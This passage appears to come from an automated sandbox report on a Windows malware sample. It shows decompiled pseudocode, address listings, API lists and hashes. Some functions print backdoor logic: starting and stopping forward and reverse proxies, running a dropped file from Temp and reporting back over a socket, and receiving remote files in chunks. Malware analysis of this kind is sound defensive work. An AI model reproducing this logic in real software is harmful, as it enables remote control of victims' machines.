                              																_t115 = _t115 + _t92;
                              																if( *_t115 != 0) {
                              																	continue;
                              																} else {
                              																	goto L17;
                              																}
                              															}
                              															goto L63;
                              														}
                              													}
                              												}
                              												goto L17;
                              											}
                              										}
                              									} else {
                              										L17:
                              										_push(3);
                              										goto L13;
                              									}
                              								} else {
                              									L15:
                              								}
                              							} else {
                              								_push(2);
                              								L13:
                              							}
                              						} else {
                              							L36:
                              							_t126 = 0;
                              							_t72 = MultiByteToWideChar(_a32, 9, _v36, _t128, 0, 0);
                              							_v44 = _t72;
                              							if(_t72 == 0) {
                              								L5:
                              							} else {
                              								_t120 = _t72 + _t72;
                              								asm("sbb eax, eax");
                              								if((_t120 + 0x00000008 & _t72) == 0) {
                              									_t73 = 0;
                              									_v32 = 0;
                              									goto L45;
                              								} else {
                              									asm("sbb eax, eax");
                              									_t85 = _t72 & _t120 + 0x00000008;
                              									_t112 = _t120 + 8;
                              									if((_t72 & _t120 + 0x00000008) > 0x400) {
                              										asm("sbb eax, eax");
                              										_t87 = E0043E61D(_t112, _t85 & _t112);
                              										_v32 = _t87;
                              										if(_t87 == 0) {
                              											goto L61;
                              										} else {
                              											 *_t87 = 0xdddd;
                              											goto L43;
                              										}
                              									} else {
                              										asm("sbb eax, eax");
                              										E00450080();
                              										_t87 = _t133;
                              										_v32 = _t87;
                              										if(_t87 == 0) {
                              											L61:
                              											_t100 = _v32;
                              										} else {
                              											 *_t87 = 0xcccc;
                              											L43:
                              											_t73 =  &(_t87[4]);
                              											_v32 = _t73;
                              											L45:
                              											if(_t73 == 0) {
                              												goto L61;
                              											} else {
                              												_t129 = _a32;
                              												if(MultiByteToWideChar(_t129, 1, _v36, _t128, _t73, _v44) == 0) {
                              													goto L61;
                              												} else {
                              													_t77 = MultiByteToWideChar(_t129, 9, _v40, _t99, _t126, _t126);
                              													_v36 = _t77;
                              													if(_t77 == 0) {
                              														goto L61;
                              													} else {
                              														_t121 = _t77 + _t77;
                              														_t108 = _t121 + 8;
                              														asm("sbb eax, eax");
                              														if((_t121 + 0x00000008 & _t77) == 0) {
                              															_t130 = _t126;
                              															goto L56;
                              														} else {
                              															asm("sbb eax, eax");
                              															_t81 = _t77 & _t121 + 0x00000008;
                              															_t108 = _t121 + 8;
                              															if((_t77 & _t121 + 0x00000008) > 0x400) {
                              																asm("sbb eax, eax");
                              																_t130 = E0043E61D(_t108, _t81 & _t108);
                              																_pop(_t108);
                              																if(_t130 == 0) {
                              																	goto L59;
                              																} else {
                              																	 *_t130 = 0xdddd;
                              																	goto L54;
                              																}
                              															} else {
                              																asm("sbb eax, eax");
                              																E00450080();
                              																_t130 = _t133;
                              																if(_t130 == 0) {
                              																	L59:
                              																	_t100 = _v32;
                              																} else {
                              																	 *_t130 = 0xcccc;
                              																	L54:
                              																	_t130 =  &(_t130[4]);
                              																	L56:
                              																	if(_t130 == 0 || MultiByteToWideChar(_a32, 1, _v40, _t99, _t130, _v36) == 0) {
                              																		goto L59;
                              																	} else {
                              																		_t100 = _v32;
                              																		_t126 = L00440DAB(_t108, _t130, _v48, _a12, _v32, _v44, _t130, _v36, _t126, _t126, _t126);
                              																	}
                              																}
                              															}
                              														}
                              														E004304BD(_t130);
                              													}
                              												}
                              											}
                              										}
                              									}
                              								}
                              								E004304BD(_t100);
                              							}
                              						}
                              					}
                              				}
                              				L63:
                              				return E0042F61B(_v8 ^ _t132);
                              			}
 
                              0x0044da4d
                              0x0044da54
                              0x0044da5c
                              0x0044da5f
                              0x0044da65
                              0x0044da68
                              0x0044da6b
                              0x0044da6f
                              0x0044da72
                              0x0044da77
                              0x0044da9e
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x0044da79
                              0x0044da81
                              0x0044da83
                              0x0044da87
                              0x0044da87
                              0x0044da8c
                              0x0044daaa
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x0044da8e
                              0x0044da97
                              0x0044daac
                              0x0044daac
                              0x0044dab1
                              0x0044dab8
                              0x0044dabb
                              0x0044dabb
                              0x0044dac0
                              0x0044dacc
                              0x0044dad9
                              0x0044dae6
                              0x0044daf9
                              0x00000000
                              0x0044dafb
                              0x0044dafd
                              0x0044db30
                              0x00000000
                              0x0044db32
                              0x0044db34
                              0x0044db38
                              0x0044db3e
                              0x0044db41
                              0x0044db43
                              0x0044db46
                              0x0044db46
                              0x0044db4b
                              0x00000000
                              0x00000000
                              0x0044db4d
                              0x0044db51
                              0x0044db5b
                              0x0044db60
                              0x00000000
                              0x0044db62
                              0x00000000
                              0x0044db62
                              0x0044db60
                              0x00000000
                              0x0044db51
                              0x0044db46
                              0x0044db41
                              0x00000000
                              0x0044db38
                              0x0044daff
                              0x0044db01
                              0x0044db05
                              0x0044db0b
                              0x0044db0e
                              0x0044db10
                              0x0044db10
                              0x0044db15
                              0x00000000
                              0x00000000
                              0x0044db17
                              0x0044db1b
                              0x0044db25
                              0x0044db2a
                              0x00000000
                              0x0044db2c
                              0x00000000
                              0x0044db2c
                              0x0044db2a
                              0x00000000
                              0x0044db1b
                              0x0044db10
                              0x0044db0e
                              0x00000000
                              0x0044db05
                              0x0044dafd
                              0x0044dae8
                              0x0044dae8
                              0x0044dae8
                              0x00000000
                              0x0044dae8
                              0x0044dadb
                              0x0044dadb
                              0x0044dadd
                              0x0044dace
                              0x0044dace
                              0x0044dad0
                              0x0044dad0
                              0x0044db67
                              0x0044db67
                              0x0044db67
                              0x0044db74
                              0x0044db7a
                              0x0044db7f
                              0x0044daa0
                              0x0044db85
                              0x0044db85
                              0x0044db8d
                              0x0044db91
                              0x0044dbec
                              0x0044dbee
                              0x00000000
                              0x0044db93
                              0x0044db98
                              0x0044db9a
                              0x0044db9c
                              0x0044dba4
                              0x0044dbc8
                              0x0044dbcd
                              0x0044dbd2
                              0x0044dbd8
                              0x00000000
                              0x0044dbde
                              0x0044dbde
                              0x00000000
                              0x0044dbde
                              0x0044dba6
                              0x0044dba8
                              0x0044dbac
                              0x0044dbb1
                              0x0044dbb3
                              0x0044dbb8
                              0x0044dccd
                              0x0044dccd
                              0x0044dbbe
                              0x0044dbbe
                              0x0044dbe4
                              0x0044dbe4
                              0x0044dbe7
                              0x0044dbf1
                              0x0044dbf3
                              0x00000000
                              0x0044dbf9
                              0x0044dc01
                              0x0044dc0f
                              0x00000000
                              0x0044dc15
                              0x0044dc1e
                              0x0044dc24
                              0x0044dc29
                              0x00000000
                              0x0044dc2f
                              0x0044dc2f
                              0x0044dc32
                              0x0044dc37
                              0x0044dc3b
                              0x0044dc87
                              0x00000000
                              0x0044dc3d
                              0x0044dc42
                              0x0044dc44
                              0x0044dc46
                              0x0044dc4e
                              0x0044dc6b
                              0x0044dc75
                              0x0044dc77
                              0x0044dc7a
                              0x00000000
                              0x0044dc7c
                              0x0044dc7c
                              0x00000000
                              0x0044dc7c
                              0x0044dc50
                              0x0044dc52
                              0x0044dc56
                              0x0044dc5b
                              0x0044dc5f
                              0x0044dcc1
                              0x0044dcc1
                              0x0044dc61
                              0x0044dc61
                              0x0044dc82
                              0x0044dc82
                              0x0044dc89
                              0x0044dc8b
                              0x00000000
                              0x0044dca4
                              0x0044dca4
                              0x0044dcbd
                              0x0044dcbd
                              0x0044dc8b
                              0x0044dc5f
                              0x0044dc4e
                              0x0044dcc5
                              0x0044dcca
                              0x0044dc29
                              0x0044dc0f
                              0x0044dbf3
                              0x0044dbb8
                              0x0044dba4
                              0x0044dcd1
                              0x0044dcd7
                              0x0044db7f
                              0x0044dac0
                              0x0044da8c
                              0x0044dcd9
                              0x0044dcec

                              APIs
                              • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,0044DD1E,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 0044DAF1
                              • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,0044DD1E,00000000,00000000,?,00000001,?,?,?,?), ref: 0044DB74
                              • __alloca_probe_16.LIBCMT ref: 0044DBAC
                              • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,0044DD1E,?,0044DD1E,00000000,00000000,?,00000001,?,?,?,?), ref: 0044DC07
                              • __alloca_probe_16.LIBCMT ref: 0044DC56
                              • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,0044DD1E,00000000,00000000,?,00000001,?,?,?,?), ref: 0044DC1E
                                • Part of subcall function 0043E61D: HeapAlloc.KERNEL32(00000000,?,?,?,0042EB9C,?,?,00401676,?,?,?,?,?), ref: 0043E64F
                              • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,0044DD1E,00000000,00000000,?,00000001,?,?,?,?), ref: 0044DC9A
                              • __freea.LIBCMT ref: 0044DCC5
                              • __freea.LIBCMT ref: 0044DCD1
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocHeapInfo
                              • String ID:
                              • API String ID: 3256262068-0
                              • Opcode ID: d1efc3889ecc57394a22abd76ff854e0d4998e8e64a2da47529485e4d0a21682
                              • Instruction ID: 32459ac01eef459e87745deb4d3fcc9efc23f9fccd5395e8f543d2d3ef9bbe94
                              • Opcode Fuzzy Hash: d1efc3889ecc57394a22abd76ff854e0d4998e8e64a2da47529485e4d0a21682
                              • Instruction Fuzzy Hash: 6D91B171E042169AFF208E65CC81EAFBBB5EF09714F14456BE901E7381D769DC40C769
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 65%
                              			E0040F248(char* __edx, void* __eflags, intOrPtr _a4) {
                              				char _v32;
                              				char _v56;
                              				void* _v60;
                              				char _v72;
                              				char _v76;
                              				char _v80;
                              				char _v88;
                              				char _v92;
                              				void* _v96;
                              				char _v108;
                              				char _v112;
                              				void* __ebx;
                              				void* __edi;
                              				void* __ebp;
                              				intOrPtr* _t23;
                              				void* _t29;
                              				char* _t32;
                              				intOrPtr _t45;
                              				char* _t46;
                              				char* _t53;
                              				char* _t58;
                              				intOrPtr _t110;
                              				void* _t114;
                              				void* _t115;
                              				char* _t117;
                              				void* _t118;
                              				void* _t119;
                              				void* _t121;
                              				signed int _t123;
                              				void* _t126;
                              				void* _t127;
                              				void* _t128;
                              				void* _t132;
                              
                              				_t134 = __eflags;
                              				_t101 = __edx;
                              				_push(_t61);
                              				_t110 = _a4;
                              				E004020CC(_t61,  &_v76, __edx, __eflags, _t110 + 0x1c);
                              				SetEvent( *(_t110 + 0x34));
                              				_t23 = L00401F75( &_v80);
                              				E00404286( &_v80,  &_v56, 4, 0xffffffff);
                              				_t126 = (_t123 & 0xfffffff8) - 0x3c;
                              				E004020CC(_t61, _t126, _t101, _t134, 0x46c238);
                              				_t127 = _t126 - 0x18;
                              				E004020CC(_t61, _t127, _t101, _t134,  &_v72);
                              				_t29 = L00416DD0( &_v112, _t101);
                              				_t128 = _t127 + 0x30;
                              				_t114 =  *_t23 - 0x46;
                              				if(_t114 == 0) {
                              					_t32 = E0040A15B(L00401F75(L00401E29( &_v88, _t101, __eflags, 1)));
                              					_t61 = _t32;
                              					__eflags = _t32;
                              					if(__eflags == 0) {
                              						_t115 = _t128 - 0x18;
                              						_push("1");
                              						L19:
                              						_t101 = L00402F97( &_v32, L00401E29( &_v88, _t101, __eflags, 0), 0x46c238);
                              						E0040530D(_t61, _t115, _t34, _t110, __eflags);
                              						_push(0x85);
                              						L00404A6E(_t61, _t110, _t34, __eflags);
                              						L00401FA7();
                              						L20:
                              						L00401E54( &_v108, _t101);
                              						L00401FA7();
                              						L00401FA7();
                              						return 0;
                              					}
                              					_t117 = E0040A1B1(_t61, "StartForward");
                              					 *0x46bd3c = _t117;
                              					 *0x46bd38 = E0040A1B1(_t61, "StartReverse");
                              					 *0x46bd40 = E0040A1B1(_t61, "StopForward");
                              					_t45 = E0040A1B1(_t61, "StopReverse");
                              					_t101 = "GetDirectListeningPort";
                              					 *0x46bd48 = _t45;
                              					_t46 = E0040A1B1(_t61, "GetDirectListeningPort");
                              					 *0x46bd44 = _t46;
                              					__eflags = _t117;
                              					if(__eflags == 0) {
                              						L17:
                              						_t115 = _t128 - 0x18;
                              						_push("2");
                              						goto L19;
                              					}
                              					__eflags =  *0x46bd38;
                              					if(__eflags == 0) {
                              						goto L17;
                              					}
                              					__eflags =  *0x46bd40;
                              					if(__eflags == 0) {
                              						goto L17;
                              					}
                              					__eflags = _t46;
                              					if(__eflags == 0) {
                              						goto L17;
                              					}
                              					 *0x46bd4c = 1;
                              					E004020CC(_t61, _t128 - 0x18, "GetDirectListeningPort", __eflags, L00401E29( &_v88, "GetDirectListeningPort", __eflags, 0));
                              					_push(0x76);
                              					L10:
                              					L00404A6E(_t61, _t110, _t101, __eflags);
                              					goto L20;
                              				}
                              				_t118 = _t114 - 1;
                              				if(_t118 == 0) {
                              					_t53 =  *0x46bd3c(E00436079(_t50, L00401F75(L00401E29( &_v88, _t101, __eflags, 0))));
                              					_t132 = _t128 - 0x14;
                              					L9:
                              					_t101 = _t53;
                              					L00416B7E(_t61, _t132, _t53);
                              					_push(0x77);
                              					goto L10;
                              				}
                              				_t119 = _t118 - 1;
                              				if(_t119 == 0) {
                              					__imp__#12( *0x46c774);
                              					_t58 =  *0x46bd38(_t29, E00436079(_t55, L00401F75(L00401E29( &_v92, _t101, __eflags, 0))) & 0x0000ffff);
                              					__eflags = _t58;
                              					_t99 =  !=  ? 1 :  *0x46bd4d & 0x000000ff;
                              					 *0x46bd4d =  !=  ? 1 :  *0x46bd4d & 0x000000ff;
                              					_t101 = _t58;
                              					L00416B7E(_t61, _t128 - 0x10, _t58);
                              					_push(0x78);
                              					goto L10;
                              				}
                              				_t121 = _t119 - 1;
                              				if(_t121 == 0) {
                              					_t53 =  *0x46bd40();
                              					_t132 = _t128 - 0x18;
                              					goto L9;
                              				}
                              				if(_t121 == 1) {
                              					 *0x46bd48();
                              					 *0x46bd4d = 0;
                              				}
                              				goto L20;
			}

                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID: Eventinet_ntoa
                              • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse
                              • API String ID: 3578746661-168337528
                              • Opcode ID: b7601ed5fb755dd00a6584ea2e47c4e317154d36a646c6d6260b2f142e433893
                              • Instruction ID: f9a444815650af3872de27879d45234466d6e45f99ea988061a4b43b2ad98d54
                              • Opcode Fuzzy Hash: b7601ed5fb755dd00a6584ea2e47c4e317154d36a646c6d6260b2f142e433893
                              • Instruction Fuzzy Hash: 3351D631A043019BC714BB79DC5AA6E36A59B91318F40453FF801AB6E2EF7C994887DF
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 73%
                              			E004136BA(void* __eflags, char _a4, char _a28) {
                              				char _v28;
                              				struct _SHELLEXECUTEINFOA _v88;
                              				char _v112;
                              				char _v136;
                              				char _v316;
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				void* __ebp;
                              				void* _t33;
                              				void* _t41;
                              				intOrPtr _t50;
                              				signed int _t60;
                              				char* _t68;
                              				void* _t73;
                              				void* _t87;
                              				void* _t90;
                              
                              				_t93 = __eflags;
                              				_t33 = E00402064(_t60,  &_v136, "\\");
                              				_t86 = E004075C4(_t60,  &_v112, E0043919A(_t60, __eflags, "Temp"), _t87, _t93, _t33);
                              				L00402F73(_t60,  &_v28, _t35, _t93,  &_a4);
                              				L00401FA7();
                              				_t68 =  &_v136;
                              				L00401FA7();
                              				_push(_t68);
                              				_push(_t68);
                              				_t41 = E004138F7(E0040D8E4( &_v316, _t35, _t93, L00401F75( &_v28), 0x10),  &_v316);
                              				_t94 = _t41;
                              				if(_t41 == 0) {
                              					E00402064(_t60, _t90 - 0x18, 0x45f6ac);
                              					_push(0x6f);
                              					_t73 = 0x46c7e8;
                              					goto L6;
                              				} else {
                              					_t86 =  &_a28;
                              					E00413907( &_v316,  &_a28, _t94);
                              					E0040D895( &_v316,  &_a28, _t94);
                              					_v88.hwnd = _v88.hwnd & 0x00000000;
                              					_v88.lpVerb = _v88.lpVerb & 0x00000000;
                              					_v88.cbSize = 0x3c;
                              					_v88.fMask = 0x40;
                              					_t50 = L00401F75( &_v28);
                              					asm("movaps xmm0, [0x466080]");
                              					_v88.lpFile = _t50;
                              					asm("movups [ebp-0x40], xmm0");
                              					_t60 = _t60 & 0xffffff00 | ShellExecuteExA( &_v88) != 0x00000000;
                              					_t96 = _v88.hProcess;
                              					if(_v88.hProcess != 0) {
                              						E00402064(_t60, _t90, 0x45f6ac);
                              						_push(0x70);
                              						L00404A6E(_t60, 0x46c7e8,  &_a28, _t96);
                              						WaitForSingleObject(_v88.hProcess, 0xffffffff);
                              						CloseHandle(_v88.hProcess);
                              						DeleteFileA(L00401F75( &_v28));
                              					}
                              					_t97 = _t60 - 1;
                              					if(_t60 == 1) {
                              						E00402064(_t60, _t90 - 0x18, 0x45f6ac);
                              						_push(0x6e);
                              						_t73 = 0x46c7e8;
                              						L6:
                              						L00404A6E(_t60, _t73, _t86, _t97);
                              					}
                              				}
                              				L0040CFAB(_t60,  &_v316, 0x45f6ac);
                              				L00401FA7();
                              				L00401FA7();
                              				return L00401FA7();
			}

                              APIs
                                • Part of subcall function 00413907: __EH_prolog.LIBCMT ref: 0041390C
                              • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,0045F6AC), ref: 004137B7
                              • CloseHandle.KERNEL32(00000000), ref: 004137C0
                              • DeleteFileA.KERNEL32(00000000), ref: 004137CF
                              • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00413783
                                • Part of subcall function 00404A6E: send.WS2_32(?,00000000,00000000,00000000), ref: 00404AE2
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
                              • String ID: <$@$Temp
                              • API String ID: 1704390241-1032778388
                              • Opcode ID: 561b6cc24aa72b7d61b651cf218bb8cd61d1741a20a896e296297213a2e5afc7
                              • Instruction ID: 2f37397737ec95128bf32f0f6142d0e98911ade1772a95a98b29c58449e4e073
                              • Opcode Fuzzy Hash: 561b6cc24aa72b7d61b651cf218bb8cd61d1741a20a896e296297213a2e5afc7
                              • Instruction Fuzzy Hash: D3417C719002099ADB14FB61CC56AEEB734AF00319F40417EF505760E2EF7C1B8ACB99
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 89%
                              			E0040628B(intOrPtr __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, char _a12) {
                              				intOrPtr _v8;
                              				char _v12;
                              				intOrPtr _v16;
                              				void* _v20;
                              				long _v24;
                              				char _v48;
                              				char _v72;
                              				void _v100076;
                              				void* __ebx;
                              				void* _t37;
                              				WCHAR* _t39;
                              				long _t46;
                              				struct _OVERLAPPED* _t58;
                              				intOrPtr _t77;
                              				long _t81;
                              				void* _t82;
                              				void* _t84;
                              				void* _t87;
                              
                              				E004505A0();
                              				_t74 =  &_a12;
                              				asm("xorps xmm0, xmm0");
                              				_v16 = __ecx;
                              				_t58 = 0;
                              				asm("movlpd [ebp-0x8], xmm0");
                              				_v24 = 0;
                              				E004032FA(0,  &_v48, __eflags, E00407516( &_v72,  &_a12, __eflags, L".part"));
                              				L00401ED0();
                              				_t37 = CreateFileW(L00401ECB( &_v48), 4, 0, 0, 2, 0x80, 0);
                              				_v20 = _t37;
                              				_t84 = _v8 - _a8;
                              				if(_t84 > 0) {
                              					L8:
                              					CloseHandle(_t37);
                              					_t39 = L00401ECB( &_a12);
                              					MoveFileW(L00401ECB( &_v48), _t39);
                              					_t58 = 1;
                              				} else {
                              					_t77 = _a4;
                              					if(_t84 < 0) {
                              						goto L3;
                              					} else {
                              						_t85 = _v12 - _t77;
                              						if(_v12 >= _t77) {
                              							goto L8;
                              						} else {
                              							while(1) {
                              								L3:
                              								_t46 = L00404B24( &_v100076, 0x186a0);
                              								_t81 = _t46;
                              								asm("cdq");
                              								_v12 = _v12 + _t46;
                              								asm("adc [ebp-0x4], edx");
                              								WriteFile(_v20,  &_v100076, _t81,  &_v24, _t58);
                              								_t82 = _t82 - 0x18;
                              								E0040208B(_t58, _t82, _t74, _t85,  &_v12, 8);
                              								L00404A6E(_t58, _v16, _t74, _t85, 0x57, _v16);
                              								if(_t81 <= 0) {
                              									break;
                              								}
                              								_t87 = _v8 - _a8;
                              								if(_t87 < 0 || _t87 <= 0 && _v12 < _t77) {
                              									continue;
                              								} else {
                              									_t37 = _v20;
                              									goto L8;
                              								}
                              								goto L9;
                              							}
                              							CloseHandle(_v20);
                              							DeleteFileW(L00401ECB( &_v48));
                              						}
                              					}
                              				}
                              				L9:
                              				L00401ED0();
                              				L00401ED0();
                              				return _t58;
			}

                              APIs
                                • Part of subcall function 00407516: char_traits.LIBCPMT ref: 00407531
                              • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000), ref: 004062E4
                              • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,000186A0,?), ref: 0040632C
                              • CloseHandle.KERNEL32(00000000), ref: 00406366
                              • MoveFileW.KERNEL32(00000000,00000000), ref: 0040637E
                              • CloseHandle.KERNEL32(?,00000057,?,00000008), ref: 004063A2
                              • DeleteFileW.KERNEL32(00000000), ref: 004063B1
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID: File$CloseHandle$CreateDeleteMoveWritechar_traits
                              • String ID: .part
                              • API String ID: 820096542-3499674018
                              • Opcode ID: 0b08d7c8f89f4ae88afe83d6d6890c2d5d8692f079fd1b54d9283a4737391721
                              • Instruction ID: d9bd7d9a32dec13802f65ee1536d1b778e09315ea91cc40d0f5a3459ff757ad6
                              • Opcode Fuzzy Hash: 0b08d7c8f89f4ae88afe83d6d6890c2d5d8692f079fd1b54d9283a4737391721
                              • Instruction Fuzzy Hash: 10314971D00219AFCB10EFA5DD569EEB778FB44356F10847AF812B3191DA34AA44CBA8
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 69%
                              			E0044326D(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char* _a16, int _a20, intOrPtr _a24, short* _a28, int _a32, intOrPtr _a36) {
                              				signed int _v8;
                              				int _v12;
                              				void* _v24;
                              				signed int _t49;
                              				signed int _t54;
                              				int _t58;
                              				signed int _t60;
                              				short* _t62;
                              				signed int _t66;
                              				short* _t70;
                              				int _t71;
                              				int _t78;
                              				short* _t81;
                              				signed int _t87;
                              				signed int _t90;
                              				void* _t95;
                              				void* _t96;
                              				int _t98;
                              				short* _t101;
                              				int _t103;
                              				signed int _t106;
                              				short* _t107;
                              				void* _t110;
                              
                              				_push(__ecx);
                              				_push(__ecx);
                              				_t49 =  *0x46a00c; // 0x5d382218
                              				_v8 = _t49 ^ _t106;
                              				_push(__esi);
                              				_t103 = _a20;
                              				if(_t103 > 0) {
                              					_t78 = L0043EE69(_a16, _t103);
                              					_t110 = _t78 - _t103;
                              					_t4 = _t78 + 1; // 0x1
                              					_t103 = _t4;
                              					if(_t110 >= 0) {
                              						_t103 = _t78;
                              					}
                              				}
                              				_t98 = _a32;
                              				if(_t98 == 0) {
                              					_t98 =  *( *_a4 + 8);
                              					_a32 = _t98;
                              				}
                              				_t54 = MultiByteToWideChar(_t98, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t103, 0, 0);
                              				_v12 = _t54;
                              				if(_t54 == 0) {
                              					L38:
                              					return E0042F61B(_v8 ^ _t106);
                              				} else {
                              					_t95 = _t54 + _t54;
                              					_t85 = _t95 + 8;
                              					asm("sbb eax, eax");
                              					if((_t95 + 0x00000008 & _t54) == 0) {
                              						_t81 = 0;
                              						__eflags = 0;
                              						L14:
                              						if(_t81 == 0) {
                              							L36:
                              							_t105 = 0;
                              							L37:
                              							E004304BD(_t81);
                              							goto L38;
                              						}
                              						_t58 = MultiByteToWideChar(_t98, 1, _a16, _t103, _t81, _v12);
                              						_t121 = _t58;
                              						if(_t58 == 0) {
                              							goto L36;
                              						}
                              						_t100 = _v12;
                              						_t60 = E0044132F(_t85, _t103, _t121, _a8, _a12, _t81, _v12, 0, 0, 0, 0, 0);
                              						_t105 = _t60;
                              						if(_t105 == 0) {
                              							goto L36;
                              						}
                              						if((_a12 & 0x00000400) == 0) {
                              							_t96 = _t105 + _t105;
                              							_t87 = _t96 + 8;
                              							__eflags = _t96 - _t87;
                              							asm("sbb eax, eax");
                              							__eflags = _t87 & _t60;
                              							if((_t87 & _t60) == 0) {
                              								_t101 = 0;
                              								__eflags = 0;
                              								L30:
                              								__eflags = _t101;
                              								if(__eflags == 0) {
                              									L35:
                              									E004304BD(_t101);
                              									goto L36;
                              								}
                              								_t62 = E0044132F(_t87, _t105, __eflags, _a8, _a12, _t81, _v12, _t101, _t105, 0, 0, 0);
                              								__eflags = _t62;
                              								if(_t62 == 0) {
                              									goto L35;
                              								}
                              								_push(0);
                              								_push(0);
                              								__eflags = _a28;
                              								if(_a28 != 0) {
                              									_push(_a28);
                              									_push(_a24);
                              								} else {
                              									_push(0);
                              									_push(0);
                              								}
                              								_t105 = WideCharToMultiByte(_a32, 0, _t101, _t105, ??, ??, ??, ??);
                              								__eflags = _t105;
                              								if(_t105 != 0) {
                              									E004304BD(_t101);
                              									goto L37;
                              								} else {
                              									goto L35;
                              								}
                              							}
                              							_t90 = _t96 + 8;
                              							__eflags = _t96 - _t90;
                              							asm("sbb eax, eax");
                              							_t66 = _t60 & _t90;
                              							_t87 = _t96 + 8;
                              							__eflags = _t66 - 0x400;
                              							if(_t66 > 0x400) {
                              								__eflags = _t96 - _t87;
                              								asm("sbb eax, eax");
                              								_t101 = E0043E61D(_t87, _t66 & _t87);
                              								_pop(_t87);
                              								__eflags = _t101;
                              								if(_t101 == 0) {
                              									goto L35;
                              								}
                              								 *_t101 = 0xdddd;
                              								L28:
                              								_t101 =  &(_t101[4]);
                              								goto L30;
                              							}
                              							__eflags = _t96 - _t87;
                              							asm("sbb eax, eax");
                              							E00450080();
                              							_t101 = _t107;
                              							__eflags = _t101;
                              							if(_t101 == 0) {
                              								goto L35;
                              							}
                              							 *_t101 = 0xcccc;
                              							goto L28;
                              						}
                              						_t70 = _a28;
                              						if(_t70 == 0) {
                              							goto L37;
                              						}
                              						_t125 = _t105 - _t70;
                              						if(_t105 > _t70) {
                              							goto L36;
                              						}
                              						_t71 = E0044132F(0, _t105, _t125, _a8, _a12, _t81, _t100, _a24, _t70, 0, 0, 0);
                              						_t105 = _t71;
                              						if(_t71 != 0) {
                              							goto L37;
                              						}
                              						goto L36;
                              					}
                              					asm("sbb eax, eax");
                              					_t72 = _t54 & _t95 + 0x00000008;
                              					_t85 = _t95 + 8;
                              					if((_t54 & _t95 + 0x00000008) > 0x400) {
                              						__eflags = _t95 - _t85;
                              						asm("sbb eax, eax");
                              						_t81 = E0043E61D(_t85, _t72 & _t85);
                              						_pop(_t85);
                              						__eflags = _t81;
                              						if(__eflags == 0) {
                              							goto L36;
                              						}
                              						 *_t81 = 0xdddd;
                              						L12:
                              						_t81 =  &(_t81[4]);
                              						goto L14;
                              					}
                              					asm("sbb eax, eax");
                              					E00450080();
                              					_t81 = _t107;
                              					if(_t81 == 0) {
                              						goto L36;
                              					}
                              					 *_t81 = 0xcccc;
                              					goto L12;
                              				}
                              			}

                              APIs
                              • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,00428772,?,?,?,004434BE,00000001,00000001,?), ref: 004432C7
                              • __alloca_probe_16.LIBCMT ref: 004432FF
                              • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,00428772,?,?,?,004434BE,00000001,00000001,?), ref: 0044334D
                              • __alloca_probe_16.LIBCMT ref: 004433E4
                              • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00443447
                              • __freea.LIBCMT ref: 00443454
                                • Part of subcall function 0043E61D: HeapAlloc.KERNEL32(00000000,?,?,?,0042EB9C,?,?,00401676,?,?,?,?,?), ref: 0043E64F
                              • __freea.LIBCMT ref: 0044345D
                              • __freea.LIBCMT ref: 00443482
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocHeap
                              • String ID:
                              • API String ID: 2597970681-0
                              • Opcode ID: 62498b2ee06e030f5c60595c331dd3b474f73ff538d16402fb36f2dd318d4ec5
                              • Instruction ID: 0cad5e9ef2b3b2de0836d9d1cfed8af2ee8cc4fd49053d42945b5b1fc1f44aaa
                              • Opcode Fuzzy Hash: 62498b2ee06e030f5c60595c331dd3b474f73ff538d16402fb36f2dd318d4ec5
